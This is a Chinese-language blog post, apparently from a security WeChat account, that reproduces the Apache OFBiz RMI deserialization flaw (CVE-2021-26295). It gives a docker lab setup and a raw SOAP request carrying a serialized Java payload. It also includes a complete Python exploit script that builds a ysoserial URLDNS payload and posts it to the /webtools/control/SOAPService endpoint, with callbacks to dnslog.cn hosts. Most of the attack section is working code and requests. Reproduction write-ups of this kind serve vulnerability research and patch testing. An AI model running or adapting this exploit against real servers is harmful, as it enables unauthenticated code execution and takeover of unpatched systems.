Apache OFBiz rmi反序列化(CVE-2021-26295)復現
一、漏洞描述
Apache OFBiz存在RMI反序列化前台命令執行,未經身份驗證攻擊者可構造惡意請求,觸發反序列化,從而造成任意代碼執行,控制服務器。
二、影響范圍
Apache OFBiz:<17.12.06
三、環境搭建&漏洞復現
docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz
拉取鏡像
漏洞復現:
encode腳本:
import binascii
filename = 'thelostworld.ot'
with open(filename, 'rb') as f:
content = f.read()
print(binascii.hexlify(content))
POC:
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.0.115:8443
Content-Type: application/xml
Content-Length: 831
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>aced00057372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00014c0004686f737471007e00014c000870726f746f636f6c71007e00014c000372656671007e00017870ffffffffffffffff7400177478663737372e7234343976762e646e736c6f672e636e74000071007e0003740004687474707078</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://noxj3z.dnslog.cn"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
python3 OFBizPoc.py "https://192.168.0.115:8443/" "http://68zfh0.dnslog.cn"
腳本:Powered by 0x141 Team ShimizuKawasaki
import requests
import sys
import subprocess
from urllib3.exceptions import InsecureRequestWarning
def trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
if __name__ == '__main__':
print('''
=========================================
____ ______ ____ _ _____ ____ _____
/ __ \| ____| _ \(_) | __ \ / __ \ / ____|
| | | | |__ | |_) |_ ____ | |__) | | | | |
| | | | __| | _ <| |_ / | ___/| | | | |
| |__| | | | |_) | |/ / | | | |__| | |____
\____/|_| |____/|_/___| |_| \____/ \_____|
Powered by 0x141 Team ShimizuKawasaki
=========================================
'''
)
host = sys.argv[1]
comForKey = sys.argv[2]
popen = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", comForKey], stdout=subprocess.PIPE)
data = popen.stdout.read()
if len(data) == 0:
print("請在當前腳本目錄放置ysoserial.jar!")
else :
hex_data = trans(data)
headers = {'Content-Type': 'text/xml'}
post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/"><ns1:cus-obj>%s</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)
if res.status_code == 200 :
print("已經測試完成,請檢查你的dnslog: " + comForKey)
參考:
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
